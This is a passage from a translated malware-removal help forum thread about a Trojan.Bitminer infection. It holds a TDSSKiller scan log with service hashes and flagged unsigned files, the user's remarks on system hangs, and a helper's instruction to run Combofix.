21:10:45.0843 4344 [ 786DB5771F05EF300390399F626BF30A ] volsnap C:\Windows\system32\drivers\volsnap.sys 21:10:45.0874 4344 volsnap - ok 21:10:45.0890 4344 [ 587253E09325E6BF226B299774B728A9 ] vsmraid C:\Windows\system32\drivers\vsmraid.sys 21:10:45.0905 4344 vsmraid - ok 21:10:45.0983 4344 [ DB3D19F850C6EB32BDCB9BC0836ACDDB ] VSS C:\Windows\system32\vssvc.exe 21:10:46.0077 4344 VSS - ok 21:10:46.0124 4344 [ 96EA68B9EB310A69C25EBB0282B2B9DE ] W32Time C:\Windows\system32\w32time.dll 
21:10:46.0155 4344 W32Time - ok 21:10:46.0171 4344 [ 48DFEE8F1AF7C8235D4E626F0C4FE031 ] WacomPen C:\Windows\system32\drivers\wacompen.sys 21:10:46.0233 4344 WacomPen - ok 21:10:46.0249 4344 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarp C:\Windows\system32\DRIVERS\wanarp.sys 21:10:46.0280 4344 Wanarp - ok 21:10:46.0280 4344 [ 55201897378CCA7AF8B5EFD874374A26 ] Wanarpv6 C:\Windows\system32\DRIVERS\wanarp.sys 21:10:46.0311 4344 Wanarpv6 - ok 21:10:46.0358 4344 [ A3CD60FD826381B49F03832590E069AF ] wcncsvc C:\Windows\System32\wcncsvc.dll 21:10:46.0420 4344 wcncsvc - ok 21:10:46.0451 4344 [ 11BCB7AFCDD7AADACB5746F544D3A9C7 ] WcsPlugInService C:\Windows\System32\WcsPlugInService.dll 21:10:46.0483 4344 WcsPlugInService - ok 21:10:46.0514 4344 [ 78FE9542363F297B18C027B2D7E7C07F ] Wd C:\Windows\system32\drivers\wd.sys 21:10:46.0545 4344 Wd - ok 21:10:46.0592 4344 [ A840213F1ACDCC175B4D1D5AAEAC0D7A ] Wdf01000 C:\Windows\system32\drivers\Wdf01000.sys 21:10:46.0639 4344 Wdf01000 - ok 21:10:46.0654 4344 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiServiceHost C:\Windows\system32\wdi.dll 21:10:46.0701 4344 WdiServiceHost - ok 21:10:46.0717 4344 [ ABFC76B48BB6C96E3338D8943C5D93B5 ] WdiSystemHost C:\Windows\system32\wdi.dll 21:10:46.0748 4344 WdiSystemHost - ok 21:10:46.0779 4344 [ 04C37D8107320312FBAE09926103D5E2 ] WebClient C:\Windows\System32\webclnt.dll 21:10:46.0826 4344 WebClient - ok 21:10:46.0857 4344 [ AE3736E7E8892241C23E4EBBB7453B60 ] Wecsvc C:\Windows\system32\wecsvc.dll 21:10:46.0888 4344 Wecsvc - ok 21:10:46.0919 4344 [ 670FF720071ED741206D69BD995EA453 ] wercplsupport C:\Windows\System32\wercplsupport.dll 21:10:46.0966 4344 wercplsupport - ok 21:10:47.0013 4344 [ 32B88481D3B326DA6DEB07B1D03481E7 ] WerSvc C:\Windows\System32\WerSvc.dll 21:10:47.0029 4344 WerSvc - ok 21:10:47.0075 4344 [ 5A77AC34A0FFB70CE8B35B524FEDE9BA ] winachsf C:\Windows\system32\DRIVERS\HSX_CNXT.sys 21:10:47.0122 4344 winachsf - ok 21:10:47.0185 4344 [ 4575AA12561C5648483403541D0D7F2B ] WinDefend 
C:\Program Files\Windows Defender\mpsvc.dll 21:10:47.0200 4344 WinDefend - ok 21:10:47.0200 4344 WinHttpAutoProxySvc - ok 21:10:47.0294 4344 [ 6B2A1D0E80110E3D04E6863C6E62FD8A ] Winmgmt C:\Windows\system32\wbem\WMIsvc.dll 21:10:47.0325 4344 Winmgmt - ok 21:10:47.0403 4344 [ 7CFE68BDC065E55AA5E8421607037511 ] WinRM C:\Windows\system32\WsmSvc.dll 21:10:47.0512 4344 WinRM - ok 21:10:47.0575 4344 [ C008405E4FEEB069E30DA1D823910234 ] Wlansvc C:\Windows\System32\wlansvc.dll 21:10:47.0653 4344 Wlansvc - ok 21:10:47.0777 4344 [ 5144AE67D60EC653F97DDF3FEED29E77 ] wlidsvc C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE 21:10:47.0887 4344 wlidsvc - ok 21:10:47.0933 4344 [ 2E7255D172DF0B8283CDFB7B433B864E ] WmiAcpi C:\Windows\system32\DRIVERS\wmiacpi.sys 21:10:47.0980 4344 WmiAcpi - ok 21:10:48.0043 4344 [ 43BE3875207DCB62A85C8C49970B66CC ] wmiApSrv C:\Windows\system32\wbem\WmiApSrv.exe 21:10:48.0089 4344 wmiApSrv - ok 21:10:48.0183 4344 [ C8F8AAC50B5B0BF821AB7D7126056B30 ] WMIService C:\Acer\Empowering Technology\ePower\ePowerSvc.exe 21:10:48.0199 4344 WMIService ( UnsignedFile.Multi.Generic ) - warning 21:10:48.0199 4344 WMIService - detected UnsignedFile.Multi.Generic (1) 21:10:48.0261 4344 [ 3978704576A121A9204F8CC49A301A9B ] WMPNetworkSvc C:\Program Files\Windows Media Player\wmpnetwk.exe 21:10:48.0386 4344 WMPNetworkSvc - ok 21:10:48.0433 4344 [ CFC5A04558F5070CEE3E3A7809F3FF52 ] WPCSvc C:\Windows\System32\wpcsvc.dll 21:10:48.0495 4344 WPCSvc - ok 21:10:48.0542 4344 [ 801FBDB89D472B3C467EB112A0FC9246 ] WPDBusEnum C:\Windows\system32\wpdbusenum.dll 21:10:48.0589 4344 WPDBusEnum - ok 21:10:48.0635 4344 [ DE9D36F91A4DF3D911626643DEBF11EA ] WpdUsb C:\Windows\system32\DRIVERS\wpdusb.sys 21:10:48.0651 4344 WpdUsb - ok 21:10:48.0776 4344 [ DCF3E3EDF5109EE8BC02FE6E1F045795 ] WPFFontCache_v0400 C:\Windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe 21:10:48.0823 4344 WPFFontCache_v0400 - ok 21:10:48.0838 4344 [ 
E3A3CB253C0EC2494D4A61F5E43A389C ] ws2ifsl C:\Windows\system32\drivers\ws2ifsl.sys 21:10:48.0869 4344 ws2ifsl - ok 21:10:48.0916 4344 [ 1CA6C40261DDC0425987980D0CD2AAAB ] wscsvc C:\Windows\System32\wscsvc.dll 21:10:48.0963 4344 wscsvc - ok 21:10:49.0025 4344 [ 4422AC5ED8D4C2F0DB63E71D4C069DD7 ] WSDPrintDevice C:\Windows\system32\DRIVERS\WSDPrint.sys 21:10:49.0057 4344 WSDPrintDevice - ok 21:10:49.0057 4344 WSearch - ok 21:10:49.0150 4344 [ FC3EC24FCE372C89423E015A2AC1A31E ] wuauserv C:\Windows\system32\wuaueng.dll 21:10:49.0275 4344 wuauserv - ok 21:10:49.0322 4344 [ 06E6F32C8D0A3F66D956F57B43A2E070 ] WudfPf C:\Windows\system32\drivers\WudfPf.sys 21:10:49.0353 4344 WudfPf - ok 21:10:49.0384 4344 [ 867C301E8B790040AE9CF6486E8041DF ] WUDFRd C:\Windows\system32\DRIVERS\WUDFRd.sys 21:10:49.0431 4344 WUDFRd - ok 21:10:49.0478 4344 [ FE47B7BC8EA320C2D9B5E5BF6E303765 ] wudfsvc C:\Windows\System32\WUDFSvc.dll 21:10:49.0509 4344 wudfsvc - ok 21:10:49.0540 4344 [ 88AF537264F2B818DA15479CEEAF5D7C ] XAudio C:\Windows\system32\DRIVERS\xaudio.sys 21:10:49.0556 4344 XAudio - ok 21:10:49.0587 4344 [ 15A317674A08DF26BE65164D959E9203 ] XAudioService C:\Windows\system32\DRIVERS\xaudio.exe 21:10:49.0618 4344 XAudioService - ok 21:10:49.0665 4344 [ 09E5340BD9B2CB730BF4DC6BE7721291 ] xusb21 C:\Windows\system32\DRIVERS\xusb21.sys 21:10:49.0681 4344 xusb21 - ok 21:10:49.0759 4344 [ 04E268ADFC81964C49DC0C082D520F7E ] yukonwlh C:\Windows\system32\DRIVERS\yk60x86.sys 21:10:49.0837 4344 yukonwlh - ok 21:10:49.0852 4344 ================ Scan global =============================== 21:10:49.0899 4344 [ F31EEBC1A1C81FD04005489CC3DCDFE7 ] C:\Windows\system32\basesrv.dll 21:10:49.0946 4344 [ A508314231C49AEE86987CEA3EAECAD1 ] C:\Windows\system32\winsrv.dll 21:10:49.0977 4344 [ A508314231C49AEE86987CEA3EAECAD1 ] C:\Windows\system32\winsrv.dll 21:10:50.0024 4344 [ D4E6D91C1349B7BFB3599A6ADA56851B ] C:\Windows\system32\services.exe 21:10:50.0039 4344 [Global] - ok 21:10:50.0039 4344 ================ 
Scan MBR ==================================
21:10:50.0055 4344 [ 6FC6F9186C07BCA94E140F63BFE6E9B4 ] \Device\Harddisk0\DR0
21:10:53.0019 4344 \Device\Harddisk0\DR0 - ok
21:10:53.0019 4344 ================ Scan VBR ==================================
21:10:53.0035 4344 [ C41FA18DEDEC7D3E30F3881297CB79EB ] \Device\Harddisk0\DR0\Partition1
21:10:53.0035 4344 \Device\Harddisk0\DR0\Partition1 - ok
21:10:53.0050 4344 [ 5208586EACB52532FE084F9B665E647F ] \Device\Harddisk0\DR0\Partition2
21:10:53.0050 4344 \Device\Harddisk0\DR0\Partition2 - ok
21:10:53.0050 4344 ============================================================
21:10:53.0050 4344 Scan finished
21:10:53.0050 4344 ============================================================
21:10:53.0066 4112 Detected object count: 11
21:10:53.0066 4112 Actual detected object count: 11
21:11:09.0118 4112 AVerRemote ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0118 4112 AVerRemote ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0118 4112 AVerScheduleService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0118 4112 AVerScheduleService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0134 4112 eLockService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0134 4112 eLockService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0134 4112 eNet Service ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0134 4112 eNet Service ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0134 4112 eRecoveryService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0134 4112 eRecoveryService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0149 4112 eSettingsService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0149 4112 eSettingsService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0149 4112 LightScribeService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0149 4112 LightScribeService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0149 4112 ndsvc ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0149 4112 ndsvc ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0165 4112 NTIDrvr ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0165 4112 NTIDrvr ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0165 4112 VNUSB ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0165 4112 VNUSB ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:09.0181 4112 WMIService ( UnsignedFile.Multi.Generic ) - skipped by user
21:11:09.0181 4112 WMIService ( UnsignedFile.Multi.Generic ) - User select action: Skip
21:11:20.0584 3284 Deinitialize success

By the way, I had to write this post from another computer, because the affected computer made all sorts of programs "hang". For example, I had disconnected the Internet connection so that I could switch off the virus scanner while TDSSKiller is running, and when I try to open the Network Connections window, nothing has happened for about 10 minutes. Same phenomenon with a few other windows, but luckily I was able to copy the log files (after 2 attempts) to a USB stick... EDIT: After 2 restarts Windows seems to be running normally again, apart from this blocked autostarts message... Last edited by Hagaaar (04.06.2013 at 21:15) |
05.06.2013, 11:25 | #9 |
/// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Let's take a further look. Scan with Combofix
__________________ - Please forward suspicious mails to us for analysis: markusg.trojaner-board@web.de Forwarding instructions: http://markusg.trojaner-board.de For now, please forward mails to markusg.trojaner-board@web.de following the instructions above. If you would like to support us |
05.06.2013, 15:19 | #10 |
| Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Thanks for sticking with this! Unfortunately I can only continue tomorrow, since this is not my computer and I therefore don't have it with me. I will go through the Combofix steps tomorrow evening and then report back. |
05.06.2013, 17:47 | #11 |
/// Malware-holic | Trojan.Bitminer "C:\Users\***\AppDate\Roaming\pejo\scvhost.exe" Please leave out such in-between posts, since new ones get appended to them. I will probably be away from tomorrow until Saturday. |